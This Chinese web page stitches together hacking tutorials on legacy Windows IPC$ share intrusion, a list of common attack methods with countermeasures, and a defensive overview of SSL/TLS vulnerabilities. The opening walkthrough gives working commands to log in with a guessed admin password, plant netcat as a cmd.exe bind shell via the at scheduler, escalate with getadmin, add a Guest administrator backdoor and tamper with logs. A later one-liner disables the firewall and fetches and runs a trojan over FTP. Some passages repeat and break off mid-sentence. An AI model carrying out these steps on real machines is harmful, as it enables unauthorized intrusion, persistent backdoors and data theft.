IPC是Internet Process Connection的縮寫,也就是遠(yuǎn)程網(wǎng)絡(luò)連接。
它是Windows NT及Windows 2000特有的一項(xiàng)功能,特點(diǎn)是在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。好了,廢話少說,現(xiàn)在進(jìn)入主題。
如何找到具有IPC漏洞的主機(jī)呢?以前我都是組合一個(gè)國(guó)外的掃描工具(名字我忘了)和KillUSA的LetMeIn,因?yàn)楹芏喙ぷ鞫际鞘止ね瓿傻?,所以速度可想而知了。現(xiàn)在因?yàn)橛辛诵¢诺牧鞴?000,所以找到這樣的主機(jī)實(shí)在是太簡(jiǎn)單了,具體操作我就不說了,大家可以參考該軟件的說明文檔。
好了,假設(shè)我們已經(jīng)找到了一臺(tái)這樣的主機(jī),地址是139.223.200.xxx,管理員帳號(hào)是Administrator,密碼是123456。進(jìn)入命令行方式,正式開工。
需要說明的是,以下操作都是在目標(biāo)主機(jī)沒有禁止遠(yuǎn)程IPC$連接和啟動(dòng)Schedule服務(wù)的理想情況下進(jìn)行的。 F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。
F:\>copy nc.exe \\139.223.200.xxx\admin$ 已復(fù)制 1 個(gè)文件。 F:\>net time \\139.223.200.xxx \\139.223.200.xxx 的當(dāng)前時(shí)間是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地時(shí)間 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一項(xiàng)作業(yè),其作業(yè) ID = 0 F:\>telnet 139.223.200.xxx 1234 上面的命令很簡(jiǎn)單,你只要參考一下net,at和nc的用法就可以了。這樣,我們就登上了遠(yuǎn)程的主機(jī)。
最理想的情況是這樣的,但是,也許你會(huì)遇到目標(biāo)主機(jī)的Schedule服務(wù)沒有啟動(dòng)的情況,那么,at命令就不能用了,我們就需要增加以下步驟。 F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服務(wù)仍未啟動(dòng)。
F:\>netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上遠(yuǎn)程主機(jī)之后,我們可以做什么呢?這要視這個(gè)帳號(hào)的權(quán)限以及該主機(jī)的安全策略來決定。如果你的權(quán)限不夠的話,可以試試下面的步驟。
首先在本地執(zhí)行下面的命令。 F:\>copy getadmin.exe \\139.223.200.xxx\admin$ 已復(fù)制 1 個(gè)文件。
F:\>copy gasys.dll \\139.223.200.xxx\admin$ 已復(fù)制 1 個(gè)文件。 其次,在遠(yuǎn)程主機(jī)運(yùn)行下面的命令。
C:\WINNT\system32>getadmin 如果成功的話,你就是這臺(tái)主機(jī)的管理員了,權(quán)限夠大了吧?:-) 那么,現(xiàn)在我們能做什么呢?改主頁(yè)?下載SAM數(shù)據(jù)庫(kù)?都可以啦!方法有很多,我就不一一說了,具體方法可以參考相關(guān)教程。我一般對(duì)目標(biāo)主機(jī)上的WORD文檔和數(shù)據(jù)庫(kù)比較感興趣,呵呵。
其實(shí),如果你在這臺(tái)機(jī)子上面放個(gè)木馬或者病毒什么的東東,做起事來更容易一些,但是我覺得如果你跟他沒什么深仇大恨的話,還是不要這么做了,這樣不好。 作完了你要做的事,不要忘了做個(gè)后門。
C:\WINNT\system32>net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32>net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 這是個(gè)比較簡(jiǎn)單的后門,要想做的更好一些,可以象Linux那樣,做出一套R(shí)ootKits來,其實(shí)這樣的東東目前已經(jīng)有了,你只要拿來用就可以了。現(xiàn)在搞破壞真是簡(jiǎn)單多了,那么多的傻瓜工具任你用,哎!要想自保,不學(xué)點(diǎn)安全知識(shí)怎么行呢? 最后,我們得修理一下日志。
雖然Redp0wer告訴我很少管理員會(huì)看NT的日志,但是我想修理一下還是有用的。NT的日志在什么地方呢?可以參考XUDI的文章。
但是有一點(diǎn)要記住的是,日志只能修改,不能刪除,否則就是自己把自己出賣了?。?)這方面的命令行工具也不少,你可以到一些國(guó)外的站點(diǎn)去看看。 其實(shí)有了這臺(tái)主機(jī),你還可以做的更多。
智慧+毅力+靈感=成功,這是我的經(jīng)驗(yàn)。
IPC漏洞攻擊是一個(gè)很早的漏洞了,現(xiàn)在基本不好使了,可以簡(jiǎn)單給你介紹幾個(gè)命令,用虛擬機(jī)實(shí)驗(yàn)一下,千萬別干壞事。
首先,空連接漏洞必須139.445端口打開,如果不打開,那是不成的
一般情況下139端口都是打開的,呵呵??梢酝ㄟ^流光,X-scan等掃描工具來掃一下,如果存在漏洞直接空連接即可
命令:(192.168.0.12這個(gè)地址是捏造的)
net use \\192.168.0.12\ipc$ "" /user:administrator
如果成功連接會(huì)提示的
net use z: \\192.168.0.12\c$
把對(duì)方的c盤隱射到本地的z盤,在我的電腦里面就可以看到對(duì)方的c盤了.
刪除與對(duì)方的ipc連接:
net use \\192.168.0.12\ipc$ /del
上傳木馬,控制關(guān)機(jī),設(shè)定從其,就能隨你操作了,這種就不教你了~呵呵
IPC漏洞攻擊是一個(gè)很早的漏洞了,現(xiàn)在基本不好使了,可以簡(jiǎn)單給你介紹幾個(gè)命令,用虛擬機(jī)實(shí)驗(yàn)一下,千萬別干壞事。
首先,空連接漏洞必須139.445端口打開,如果不打開,那是不成的一般情況下139端口都是打開的,呵呵??梢酝ㄟ^流光,X-scan等掃描工具來掃一下,如果存在漏洞直接空連接即可命令:(192.168.0.12這個(gè)地址是捏造的)net use \\192.168.0.12\ipc$ "" /user:administrator如果成功連接會(huì)提示的net use z: \\192.168.0.12\c$把對(duì)方的c盤隱射到本地的z盤,在我的電腦里面就可以看到對(duì)方的c盤了.刪除與對(duì)方的ipc連接:net use \\192.168.0.12\ipc$ /del上傳木馬,控制關(guān)機(jī),設(shè)定從其,就能隨你操作了,這種就不教你了。
孫子兵法上說,知己知彼,百戰(zhàn)不殆。要想有效的防范黑客對(duì)我們電腦的入侵和破壞,僅僅被動(dòng)的安裝防火墻是顯然不夠的,我們更應(yīng)該了解一些常見的黑客入侵手法,針對(duì)不同的方法采取不同的措施,做到有的放矢。
1、iis漏洞入侵
由于寬帶越來越普及,給自己的win2000或是xp裝上簡(jiǎn)單易學(xué)的iis,搭建一個(gè)不定時(shí)開放的ftp或是web站點(diǎn),相信是不少電腦愛好者所向往的,而且應(yīng)該也已經(jīng)有很多人這樣做了。
利用iis的webdav漏洞攻擊成功后的界面這里的systen32就指的是對(duì)方機(jī)器的系統(tǒng)文件夾了,也就是說黑客此刻執(zhí)行的任何命令,都是在被入侵的機(jī)器上運(yùn)行的。這個(gè)時(shí)候如果執(zhí)行format命令,危害就可想而知了,用netuser命令添加帳戶也是輕而易舉的。如下圖:
應(yīng)對(duì)措施:關(guān)注微軟官方站點(diǎn),及時(shí)安裝iis的漏洞補(bǔ)丁。
2、木馬入侵
木馬也許是廣大電腦愛好者最深惡痛絕的東東了,相信不少朋友都受到過它的騷擾。木馬有可能是黑客在已經(jīng)獲取我們操作系統(tǒng)可寫權(quán)限的前提下,由黑客上傳的(例如下面會(huì)提到的ipc$共享入侵);也可能是我們?yōu)g覽了一些垃圾個(gè)人站點(diǎn)而通過網(wǎng)頁(yè)瀏覽感染的(利用了IE漏洞);當(dāng)然,最多的情況還是我們防范意識(shí)不強(qiáng),隨便運(yùn)行了別人發(fā)來的所謂的mm圖片、好看的動(dòng)畫之類的程序或者是在不正規(guī)的網(wǎng)站上隨便下載軟件使用。應(yīng)對(duì)措施:提高防范意識(shí),不要隨意運(yùn)行別人發(fā)來的軟件。安裝木馬查殺軟件,及時(shí)更新木馬特征庫(kù)。推薦使用thecleaner,木馬克星。
3、網(wǎng)頁(yè)惡意代碼入侵
在我們?yōu)g覽網(wǎng)頁(yè)的時(shí)候不可避免的會(huì)遇到一些不正規(guī)的網(wǎng)站,它們經(jīng)常會(huì)擅自修改瀏覽者的注冊(cè)表,其直接體現(xiàn)便是修改IE的默認(rèn)主頁(yè),鎖定注冊(cè)表,修改鼠標(biāo)右鍵菜單等等。實(shí)際上絕大部分的網(wǎng)頁(yè)惡意代碼都是通過修改我們的注冊(cè)表達(dá)到目的。只要保護(hù)好自己的注冊(cè)表,就一切ok了。應(yīng)對(duì)措施:安裝具有注冊(cè)表實(shí)時(shí)監(jiān)控功能的防護(hù)軟件,做好注冊(cè)表的備份工作。禁用RemoteRegistryService服務(wù),不要上一些不該上的網(wǎng)站。
4、ipc$共享入侵
微軟在win2000,xp中設(shè)置的這個(gè)功能對(duì)個(gè)人用戶來說幾乎毫無用處。反而成了黑客入侵nt架構(gòu)操作系統(tǒng)的一條便利通道。如果你的操作系統(tǒng)存在不安全的口令,那就更可怕了。一條典型的入侵流程如下:
(1)用任何辦法得到一個(gè)帳戶與口令(猜測(cè),破解),網(wǎng)上流傳有一個(gè)叫做smbcrack的軟件就是利用ipc$來破解帳戶口令的。如果你的密碼位數(shù)不高,又很簡(jiǎn)單,是很容易被破解的。根據(jù)我的個(gè)人經(jīng)驗(yàn),相當(dāng)多的人都將administrator的口令設(shè)為123,2003,或者干脆不設(shè)密碼。
(2)使用命令netuse\xxx.xxx.xxx.xxxipc$“密碼”/user:“用戶名”建立一個(gè)有一定權(quán)限的ipc$連接。用copytrojan.exe\xxx.xxx.xxx.xxxadmin$將木馬程序的服務(wù)器端復(fù)制到系統(tǒng)目錄下。
(3)用nettime\xxx.xxx.xxx.xxx命令查看對(duì)方操作系統(tǒng)的時(shí)間,然后用at\202.xxx.xxx.xxx12:00trojan.exe讓trojan.exe在指定時(shí)間運(yùn)行。這樣一來,你的電腦就完全被黑客控制了。
應(yīng)對(duì)措施:禁用server服務(wù),TaskScheduler服務(wù),去掉網(wǎng)絡(luò)文件和打印機(jī)共享前的對(duì)勾,當(dāng)然,給自己的帳戶加上強(qiáng)壯的口令才是最關(guān)鍵的。如下圖:
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進(jìn)程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換,從而實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問。IPC$是NT/2000的一項(xiàng)新功能,它有一個(gè)特點(diǎn),即在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。NT/2000在提供了ipc$功能的同時(shí),在初次安裝系統(tǒng)時(shí)還打開了默認(rèn)共享,即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導(dǎo)致了系統(tǒng)安全性的降低。
平時(shí)我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實(shí)ipc$并不是一個(gè)真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個(gè)‘后門’,黑客就是利用了這一個(gè)漏洞。
禁止默認(rèn)共享
察看本地共享資源
運(yùn)行-cmd-輸入net share
刪除共享(每次輸入一個(gè))
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,。??梢岳^續(xù)刪除)
不過重起以后還有就要修改注冊(cè)表了
修改注冊(cè)表HKEY_LOCAL_MACHIN
E\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters增加AutoShareWks子鍵(REG_DWORD),鍵值為0。
1、獲取口令 這又有三種方法:一是通過網(wǎng)絡(luò)監(jiān)聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監(jiān)聽者往往能夠獲得其所在網(wǎng)段的所有用戶賬號(hào)和口令,對(duì)局域網(wǎng)安全威脅巨大;二是在知道用戶的賬號(hào)后(如電子郵件@前面的部分)利用一些專門軟件強(qiáng)行破解用戶口令,這種方法不受網(wǎng)段限制,但黑客要有足夠的耐心和時(shí)間;三是在獲得一個(gè)服務(wù)器上的用戶口令文件(此文件成為Shadow文件)后,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。
此方法在所有方法中危害最大,因?yàn)樗恍枰竦诙N方法那樣一遍又一遍地嘗試登錄服務(wù)器,而是在本地將加密后的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對(duì)那些弱智用戶(指口令安全系數(shù)極低的用戶,如某用戶賬號(hào)為zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一兩分鐘內(nèi),甚至幾十秒內(nèi)就可以將其干掉。 2、放置特洛伊木馬程序 特洛伊木馬 程序可以直接侵入用戶的電腦并進(jìn)行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載,一旦用戶打開了這些 郵件的附件或者執(zhí)行了這些程序之后,它們就會(huì)象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,并在自己的計(jì)算機(jī)系統(tǒng)中隱藏一個(gè)可以在Windows啟動(dòng)時(shí)悄悄執(zhí)行的程序。
當(dāng)您連接到因特網(wǎng)上時(shí),這個(gè)程序就會(huì)通知黑客,來報(bào)告您的IP地址以及預(yù)先設(shè)定的端口。黑客在收到這些信息后,再利用這個(gè)潛伏在其中的程序,就可以任意地修改您的計(jì)算機(jī)的參數(shù)設(shè)定、復(fù)制文件、窺視你整個(gè)硬盤中的內(nèi)容等,從而達(dá)到控制你的計(jì)算機(jī)的目的。
3、WWW的欺騙技術(shù) 在網(wǎng)上用戶可以利用IE等瀏覽器進(jìn)行各種各樣的WEB站點(diǎn)的訪問,如閱讀新聞組、咨詢產(chǎn)品價(jià)格、訂閱報(bào)紙、電子商務(wù)等。然而一般的用戶恐怕不會(huì)想到有這些問題存在:正在訪問的網(wǎng)頁(yè)已經(jīng)被黑客篡改過,網(wǎng)頁(yè)上的信息是虛假的!例如黑客將用戶要瀏覽的網(wǎng)頁(yè)的URL改寫為指向黑客自己的服務(wù)器,當(dāng)用戶瀏覽目標(biāo)網(wǎng)頁(yè)的時(shí)候,實(shí)際上是向黑客服務(wù)器發(fā)出請(qǐng)求,那么黑客就可以達(dá)到欺騙的目的了。
4、電子郵件攻擊 電子郵件攻擊主要表現(xiàn)為兩種方式:一是電子郵件轟炸和電子郵件“滾雪球”,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發(fā)送數(shù)以千計(jì)、萬計(jì)甚至無窮多次的內(nèi)容相同的垃圾郵件,致使受害人郵箱被“炸”, 嚴(yán)重者可能會(huì)給電子郵件服務(wù)器操作系統(tǒng)帶來危險(xiǎn),甚至癱瘓;二是電子郵件欺騙,攻擊者佯稱自己為系統(tǒng)管理員(郵件地址和系統(tǒng)管理員完全相同),給用戶發(fā)送 郵件要求用戶修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序(據(jù)筆者所知,某些單位的網(wǎng)絡(luò)管理員有定期給用戶免費(fèi)發(fā)送防火 墻升級(jí)程序的義務(wù),這為黑客成功地利用該方法提供了可乘之機(jī)),這類欺騙只要用戶提高警惕,一般危害性不是太大。 5、通過一個(gè)節(jié)點(diǎn)來攻擊其他節(jié)點(diǎn) 黑客在突破一臺(tái)主機(jī)后,往往以此主機(jī)作為根據(jù)地,攻擊其他主機(jī)(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。
他們可以使用網(wǎng)絡(luò)監(jiān)聽方法,嘗試攻破同一網(wǎng)絡(luò)內(nèi)的其他主機(jī);也可以通過IP欺騙和主機(jī)信任關(guān)系,攻擊其他主機(jī)。這類攻擊很狡猾,但由于某些技術(shù)很難掌握,如IP欺騙,因此較少被黑客使用。
6、網(wǎng)絡(luò)監(jiān)聽 網(wǎng)絡(luò)監(jiān)聽是主機(jī)的一種工作模式,在這種模式下,主機(jī)可以接受到本網(wǎng)段在同一條物理通道上傳輸?shù)乃行畔?,而不管這些信息的發(fā)送方和接受方是誰。此時(shí),如果兩臺(tái)主機(jī)進(jìn)行通信的信息沒有加密,只要使用某些網(wǎng)絡(luò)監(jiān)聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號(hào)在內(nèi)的信息資料。
雖然網(wǎng)絡(luò)監(jiān)聽獲得的用戶帳號(hào)和口令具有一定的局限性,但監(jiān)聽者往往能夠獲得其所在網(wǎng)段的所有用戶帳號(hào)及口令。 7、尋找系統(tǒng)漏洞 許多系統(tǒng)都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統(tǒng)或應(yīng)用軟件本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗(yàn)證漏洞和IE5漏洞等,這些漏洞在補(bǔ)丁未被開發(fā)出來之前一般很難防御黑客的破壞,除非你將網(wǎng)線拔掉;還有一些漏洞是由于系統(tǒng)管理員配置錯(cuò)誤引起的,如在網(wǎng)絡(luò)文件系統(tǒng)中,將目錄和文件以可寫的方式調(diào)出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會(huì)給黑客帶來可乘之機(jī),應(yīng)及時(shí)加以修正。
8、利用帳號(hào)進(jìn)行攻擊 有的黑客會(huì)利用操作系統(tǒng)提供的缺省賬戶和密碼進(jìn)行攻擊,例如許多UNIX主機(jī)都有FTP和Guest等缺省賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統(tǒng)提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。
這類攻擊只要系統(tǒng)管理員提高警惕,將系統(tǒng)提供的缺省賬戶關(guān)掉或提醒無口令用戶增加口令一般都能克服。 9、偷取特權(quán) 利用各種特洛伊木馬程序、后門程序和黑客自己編寫的導(dǎo)致緩沖區(qū)溢出的程序進(jìn)行攻擊,前者可使黑客非法獲得對(duì)用戶機(jī)器的完全控制權(quán),后者可使黑客獲得超級(jí)用戶的權(quán)限,從而擁有。
使用AT命令提權(quán)
AT 9:00 net user 123 /add
然后放到管理員組
這個(gè)就提權(quán)了
用FTP下載鴿子也可以,
%windir%\system32\cmd.exe /c c:\&net stop sharedaccess&echo open 域名> t.t&echo 用戶>>t.t&echo 密碼>>t.t&echo get mm.exe c:\mm.exe >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&c:\mm.exe
SSL/TLS漏洞目前還是比較普遍的,首先關(guān)閉協(xié)議:SSL2、SSL3(比較老的SSL協(xié)議)配置完成ATS安全標(biāo)準(zhǔn)就可以避免以下的攻擊了,最新的服務(wù)器環(huán)境都不會(huì)有一下問題,當(dāng)然這種漏洞都是自己部署證書沒有配置好導(dǎo)致的。
Export 加密算法Export是一種老舊的弱加密算法,是被美國(guó)法律標(biāo)示為可出口的加密算法,其限制對(duì)稱加密最大強(qiáng)度位數(shù)為40位,限制密鑰交換強(qiáng)度為最大512位。這是一個(gè)現(xiàn)今被強(qiáng)制丟棄的算法。
Downgrade(降級(jí)攻擊)降級(jí)攻擊是一種對(duì)計(jì)算機(jī)系統(tǒng)或者通信協(xié)議的攻擊,在降級(jí)攻擊中,攻擊者故意使系統(tǒng)放棄新式、安全性高的工作方式,反而使用為向下兼容而準(zhǔn)備的老式、安全性差的工作方式,降級(jí)攻擊常被用于中間人攻擊,講加密的通信協(xié)議安全性大幅削弱,得以進(jìn)行原本不可能做到的攻擊。 在現(xiàn)代的回退防御中,使用單獨(dú)的信號(hào)套件來指示自愿降級(jí)行為,需要理解該信號(hào)并支持更高協(xié)議版本的服務(wù)器來終止協(xié)商,該套件是TLS_FALLBACK_SCSV(0x5600)MITM(中間人攻擊)MITM(Man-in-the-MiddleAttack) ,是指攻擊者與通訊的兩端分別創(chuàng)建獨(dú)立的聯(lián)系,并交換其所有收到的數(shù)據(jù),使通訊的兩端認(rèn)為他們正在通過一個(gè)私密的連接與對(duì)方直接對(duì)話,但事實(shí)上整個(gè)對(duì)話都被攻擊者完全控制,在中間人攻擊中,攻擊者可以攔截通訊雙方的通話并插入新的內(nèi)容。
一個(gè)中間人攻擊能成功的前提條件是攻擊者能夠?qū)⒆约簜窝b成每個(gè)參與會(huì)話的終端,并且不被其他終端識(shí)破。BEAST(野獸攻擊)BEAST(CVE-2011-3389) BEAST是一種明文攻擊,通過從SSL/TLS加密的會(huì)話中獲取受害者的COOKIE值(通過進(jìn)行一次會(huì)話劫持攻擊),進(jìn)而篡改一個(gè)加密算法的 CBC(密碼塊鏈)的模式以實(shí)現(xiàn)攻擊目錄,其主要針對(duì)TLS1.0和更早版本的協(xié)議中的對(duì)稱加密算法CBC模式。
RC4 加密算法由于早期的BEAST野獸攻擊而采用的加密算法,RC4算法能減輕野獸攻擊的危害,后來隨著客戶端版本升級(jí),有了客戶端緩解方案(Chrome 和 Firefox 提供了緩解方案),野獸攻擊就不是什么大問題了。同樣這是一個(gè)現(xiàn)今被強(qiáng)制丟棄的算法。
CRIME(罪惡攻擊)CRIME(CVE-2012-4929),全稱Compression Ratio Info-leak Made Easy,這是一種因SSL壓縮造成的安全隱患,通過它可竊取啟用數(shù)據(jù)壓縮特性的HTTPS或SPDY協(xié)議傳輸?shù)乃矫躓eb Cookie。在成功讀取身份驗(yàn)證Cookie后,攻擊者可以實(shí)行會(huì)話劫持和發(fā)動(dòng)進(jìn)一步攻擊。
SSL 壓縮在下述版本是默認(rèn)關(guān)閉的: nginx 1.1.6及更高/1.0.9及更高(如果使用了 OpenSSL 1.0.0及更高), nginx 1.3.2及更高/1.2.2及更高(如果使用較舊版本的 OpenSSL)。如果你使用一個(gè)早期版本的 nginx 或 OpenSSL,而且你的發(fā)行版沒有向后移植該選項(xiàng),那么你需要重新編譯沒有一個(gè) ZLIB 支持的 OpenSSL。
這會(huì)禁止 OpenSSL 使用 DEFLATE 壓縮方式。如果你禁用了這個(gè),你仍然可以使用常規(guī)的 HTML DEFLATE 壓縮。
Heartbleed(心血漏洞)Heartbleed(CVE-2014-0160) 是一個(gè)于2014年4月公布的 OpenSSL 加密庫(kù)的漏洞,它是一個(gè)被廣泛使用的傳輸層安全(TLS)協(xié)議的實(shí)現(xiàn)。無論是服務(wù)器端還是客戶端在 TLS 中使用了有缺陷的 OpenSSL,都可以被利用該缺陷。
由于它是因 DTLS 心跳擴(kuò)展(RFC 6520)中的輸入驗(yàn)證不正確(缺少了邊界檢查)而導(dǎo)致的,所以該漏洞根據(jù)“心跳”而命名。這個(gè)漏洞是一種緩存區(qū)超讀漏洞,它可以讀取到本不應(yīng)該讀取的數(shù)據(jù)。
如果使用帶缺陷的Openssl版本,無論是服務(wù)器還是客戶端,都可能因此受到攻擊。POODLE漏洞(卷毛狗攻擊)2014年10月14號(hào)由Google發(fā)現(xiàn)的POODLE漏洞,全稱是Padding Oracle On Downloaded Legacy Encryption vulnerability,又被稱為“貴賓犬攻擊”(CVE-2014-3566),POODLE漏洞只對(duì)CBC模式的明文進(jìn)行了身份驗(yàn)證,但是沒有對(duì)填充字節(jié)進(jìn)行完整性驗(yàn)證,攻擊者竊取采用SSL3.0版加密通信過程中的內(nèi)容,對(duì)填充字節(jié)修改并且利用預(yù)置填充來恢復(fù)加密內(nèi)容,以達(dá)到攻擊目的。
TLS POODLE(TLS卷毛狗攻擊)TLS POODLE(CVE-2014-8730) 該漏洞的原理和POODLE漏洞的原理一致,但不是SSL3協(xié)議。由于TLS填充是SSLv3的一個(gè)子集,因此可以重新使用針對(duì)TLS的POODLE攻擊。
TLS對(duì)于它的填充格式是非常嚴(yán)格的,但是一些TLS實(shí)現(xiàn)在解密之后不執(zhí)行填充結(jié)構(gòu)的檢查。即使使用TLS也不會(huì)容易受到POODLE攻擊的影響。
CCSCCS(CVE-2014-0224) 全稱openssl MITM CCS injection attack,Openssl 0.9.8za之前的版本、1.0.0m之前的以及1.0.1h之前的openssl沒有適當(dāng)?shù)南拗艭hangeCipherSpec信息的處理,這允許中間人攻擊者在通信之間使用0長(zhǎng)度的主密鑰。FREAKFREAK(CVE-2015-0204) 客戶端會(huì)在一個(gè)全安全強(qiáng)度的RSA握手過程中接受使用弱安全強(qiáng)度的出口RSA密鑰,其中關(guān)鍵在于客戶端并沒有允許協(xié)商任何出口級(jí)別的RSA密碼套件。
LogjamLogjam(CVE-2015-4000) 使用 Diffie-Hellman 密鑰交換協(xié)議的 TLS 連接很容易受到攻擊,尤其是DH密鑰中的公鑰強(qiáng)度小于1024bits。中間人攻擊者可將有漏洞的 TLS 連接降級(jí)至使用 512 字節(jié)導(dǎo)出級(jí)加密。
這種攻。
聲明:本網(wǎng)站尊重并保護(hù)知識(shí)產(chǎn)權(quán),根據(jù)《信息網(wǎng)絡(luò)傳播權(quán)保護(hù)條例》,如果我們轉(zhuǎn)載的作品侵犯了您的權(quán)利,請(qǐng)?jiān)谝粋€(gè)月內(nèi)通知我們,我們會(huì)及時(shí)刪除。
蜀ICP備2020033479號(hào)-4 Copyright ? 2016 學(xué)習(xí)鳥. 頁(yè)面生成時(shí)間:3.687秒